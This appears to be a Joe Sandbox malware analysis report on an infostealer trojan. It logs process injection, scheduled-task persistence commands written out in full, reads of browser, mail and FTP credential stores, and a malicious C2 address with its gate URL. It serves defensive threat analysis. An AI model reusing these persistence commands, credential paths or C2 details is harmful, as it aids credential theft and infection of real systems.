                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 7BD008
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5132008
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Queries volume information: C:\Users\user\Desktop\pdP5Rv9pPW.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Queries volume information: C:\Users\user\AppData\Roaming\fghn\fghn.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_09EE4ECC GetUserNameW, 2_2_09EE4ECC

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR
                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  1 Valid Accounts | 211 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 Account Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | 1 Shared Modules | 1 Scheduled Task/Job | 1 Access Token Manipulation | 11 Deobfuscate/Decode Files or Information | 11 Input Capture | 114 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | 1 Exploitation for Client Execution | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 21 Obfuscated Files or Information | 1 Credentials in Registry | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | 1 Scheduled Task/Job | Logon Script (Mac) | 1 Scheduled Task/Job | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Valid Accounts | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                  Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 311 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                  Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Hidden Files and Directories | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 691823, Sample: pdP5Rv9pPW.exe, Start date: 28/08/2022, Architecture: WINDOWS, Score: 100

Signatures attached to the sample node:
• Snort IDS alert for network traffic
• Multi AV Scanner detection for domain / URL
• Malicious sample detected (through community Yara rule)
• 6 other signatures

Process tree (indentation shows parent/child; the numbers after a process name are the created-file / registry-value counts from the graph):
• pdP5Rv9pPW.exe 4
  • dropped: C:\Users\user\AppData\...\pdP5Rv9pPW.exe.log, ASCII
  • signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
  • vbc.exe 17 4
    • network: 141.98.6.75, 49717, 49753, 80 CMCSUS Germany
    • dropped: C:\Users\user\AppData\Roaming\...\excel.exe, PE32
    • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 4 other signatures
  • cmd.exe 3
    • dropped: C:\Users\user\AppData\Roaming\fghn\fghn.exe, PE32; C:\Users\user\...\fghn.exe:Zone.Identifier, ASCII
    • conhost.exe
  • cmd.exe 2
    • signature: Uses schtasks.exe or at.exe to add and modify task schedules
    • conhost.exe
  • cmd.exe 1
    • conhost.exe
    • schtasks.exe 1
• fghn.exe 3
  • signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • vbc.exe 3
    • signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
  • cmd.exe 1
    • conhost.exe
    • schtasks.exe 1
  • 2 other processes
    • conhost.exe
    • conhost.exe
• excel.exe 1
  • signatures: Document exploit detected (process start blacklist hit); Injects files into Windows application
  • conhost.exe
• excel.exe 1
  • conhost.exe

Source | Detection | Scanner | Label
pdP5Rv9pPW.exe | 66% | Virustotal |
pdP5Rv9pPW.exe | 51% | ReversingLabs | Win32.Trojan.Mardom
pdP5Rv9pPW.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\fghn\fghn.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\excel\excel.exe | 2% | Metadefender |
C:\Users\user\AppData\Roaming\excel\excel.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\fghn\fghn.exe | 51% | ReversingLabs | Win32.Trojan.Mardom
Source | Detection | Scanner | Label
2.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                  No Antivirus matches
Source | Detection | Scanner | Label
http://141.98.6.75 | 6% | Virustotal |
http://141.98.6.75 | 0% | Avira URL Cloud | safe
http://141.98.6.75/weption/inc/0986372054b5f8.phpa | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://141.98.6.75/weption/inc/0986372054b5f8.php | 11% | Virustotal |
http://141.98.6.75/weption/inc/0986372054b5f8.php | 100% | Avira URL Cloud | phishing
https://api.ipify.org%appdata | 0% | URL Reputation | safe
http://141.98.6.75/weption/inc/0986372054b5f8.phpa( | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://ZWXWPK.com | 0% | Avira URL Cloud | safe
http://141.98.6.754 | 0% | Avira URL Cloud | safe
http://go.microsoft | 0% | Avira URL Cloud | safe
http://X7rzdy8x3IrJP.net | 0% | Avira URL Cloud | safe
https://api.ipify.org% | 0% | URL Reputation | safe
http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST | 0% | Avira URL Cloud | safe
https://di.98.6.75/weption/inc/0986372054b5f8.php | 0% | Avira URL Cloud | safe
                  No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://141.98.6.75/weption/inc/0986372054b5f8.php | true
• 11%, Virustotal
• Avira URL Cloud: phishing
Reputation: unknown
Name | Source | Malicious | Antivirus Detection | Reputation

Name: http://141.98.6.75
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
• 6%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown

Name: http://141.98.6.75/weption/inc/0986372054b5f8.phpa
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
• Avira URL Cloud: safe
Reputation: unknown

Name: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: low

Name: https://api.ipify.org%appdata
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• URL Reputation: safe
Reputation: low

Name: http://141.98.6.75/weption/inc/0986372054b5f8.phpa(
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
• Avira URL Cloud: safe
Reputation: unknown

Name: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• URL Reputation: safe
Reputation: unknown

Name: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• URL Reputation: safe
Reputation: unknown

Name: http://ZWXWPK.com
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

Name: http://141.98.6.754
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
• Avira URL Cloud: safe
Reputation: low

Name: http://go.microsoft
Source: excel.exe, 0000000C.00000002.397005792.00000000006FA000.00000004.00000010.00020000.00000000.sdmp, excel.exe, 00000010.00000002.413724237.00000000004FA000.00000004.00000010.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://X7rzdy8x3IrJP.net
Source: vbc.exe, 00000017.00000002.590068919.00000000075B6000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

Name: https://api.ipify.org%
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• URL Reputation: safe
Reputation: low

Name: http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
• Avira URL Cloud: safe
Reputation: unknown

Name: https://di.98.6.75/weption/inc/0986372054b5f8.php
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: low
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
141.98.6.75 | unknown | Germany | 33657 | CMCSUS | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 691823
Start date and time: 2022-08-28 17:18:06 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: pdP5Rv9pPW.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@32/7@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 125
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description
17:19:31 | API Interceptor | 595x Sleep call for process: vbc.exe modified
17:19:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe
17:19:32 | Task Scheduler | Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\fghn\fghn.exe"
17:19:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe
Match | Associated Sample Name / URL | Detection | Context
Match: 141.98.6.75
BL Document.exe | malicious
• 141.98.6.75/500/inc/9bce52518beca5.php
New Order15522.png.exe | malicious
• 141.98.6.75/500/inc/9bce52518beca5.php
PaymentAdvise.exe | malicious
• 141.98.6.75/500/inc/9bce52518beca5.php
                    No context
Match | Associated Sample Name / URL | Detection | Context
Match: CMCSUS
1DCAB4CDFFDF269EA33719990AC81C515345B50FE1C60.exe | malicious
• 95.214.24.96
00C0934AF824603BEF01CE8A5D9FCBD0E97432C877D40.exe | malicious
• 95.214.24.96
Host Ip Js StartUp.exe | malicious
• 171.22.30.21
Quote_PDF.js | malicious
• 171.22.30.21
E52E6BBF7705F9B90E4A20F2935CB86EE6078035F14D8.exe | malicious
• 95.214.24.96
Request Quote_PDF.js | malicious
• 171.22.30.21
Purchase Order for Atmosphere Manufacturers 776778GH.exe | malicious
• 171.22.30.205
F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exe | malicious
• 95.214.24.96
Priljevu_0080386732.xll | malicious
• 171.22.30.72
Payment Quote_PDF.js | malicious
• 171.22.30.21
Payment Quote_PDF.js | malicious
• 171.22.30.21
BL Document.exe | malicious
• 141.98.6.75
SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.10071.exe | malicious
• 171.22.30.205
Payment_PDF.js | malicious
• 171.22.30.21
RLsp6WwSVA.exe | malicious
• 95.214.24.180
BjxrrngUY0.exe | malicious
• 171.22.30.72
http://172.245.120.8/pdfreader.exe | malicious
• 171.22.30.72
cBuu3xhLbb.docx | malicious
• 171.22.30.211
z3hir.x86 | malicious
• 216.45.216.152
Payment_pdf.js | malicious
• 171.22.30.21
                    No context
Match | Associated Sample Name / URL | Detection
Match: C:\Users\user\AppData\Roaming\excel\excel.exe
SecuriteInfo.com.W32.AIDetectNet.01.9473.exe | malicious
SecuriteInfo.com.W32.AIDetectNet.01.10857.exe | malicious
SecuriteInfo.com.W32.AIDetectNet.01.20458.exe | malicious
Doc151.pif.exe | malicious
Doc0627.exe | malicious
SecuriteInfo.com.W32.AIDetectNet.01.1410.exe | malicious
Request For Quotation And Sample.pdf.exe | malicious
RFQ.exe | malicious
INVOICE.exe | malicious
SecuriteInfo.com.IL.Trojan.MSILZilla.13134.2490.exe | malicious
SecuriteInfo.com.W32.AIDetectNet.01.2799.exe | malicious
gqyMDfZZ4K.exe | malicious
Neves n 0rder.exe | malicious
products specification.exe | malicious
0JupZJZDCk.exe | malicious
TT COPY.exe | malicious
IAENMAIL-A4-220222-0830-0005036.pdf.exe | malicious
0000002065.pdf.exe | malicious
ldin.exe | malicious
2de5fe686b665d9aeb98b075fb139e33fffe278986a15.exe | malicious
Process: C:\Users\user\AppData\Roaming\fghn\fghn.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 425
Entropy (8bit): 5.340009400190196
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5: CC144808DBAF00E03294347EADC8E779
SHA1: A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256: 3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512: A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
Process: C:\Users\user\Desktop\pdP5Rv9pPW.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 425
Entropy (8bit): 5.340009400190196
Encrypted: false
